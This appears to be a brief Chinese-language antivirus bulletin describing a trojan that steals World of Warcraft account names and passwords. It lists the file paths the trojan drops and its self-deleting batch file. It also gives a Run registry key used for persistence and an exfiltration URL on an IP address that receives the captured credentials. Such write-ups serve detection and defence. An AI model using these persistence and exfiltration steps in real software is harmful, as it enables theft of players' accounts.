這是一個盜取“魔獸世界”網(wǎng)游帳號的木馬程序，病毒運行后，在后臺監(jiān)視游戲登錄窗口，記錄帳號密碼，然后通過網(wǎng)絡發(fā)送給種馬者。

1、病毒復制自身到C:\ProgramFiles\InternetExplorer\PLUGINS\temp.exe,并釋放病毒文件到C:\ProgramFiles\InternetExplorer\PLUGINS\sb.dll。

2、在當前目錄下生成名為$$a.bat的批處理文件刪除自身。

3、修改注冊表，是病毒開機自動運行：
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\Explorer\Run]
"NiceMs"="C:\ProgramFiles\InternetExplorer\PLUGINS\temp.exe"

4、設置計時器，尋找游戲登錄窗口，找到后記錄用戶帳號信息。

5、連接網(wǎng)絡，將獲得的信息提交到如下網(wǎng)頁：
http://61.152.173.27/mick/ip1/wow/mo/sendmail.asp?user=&pass=&ser=&beizh...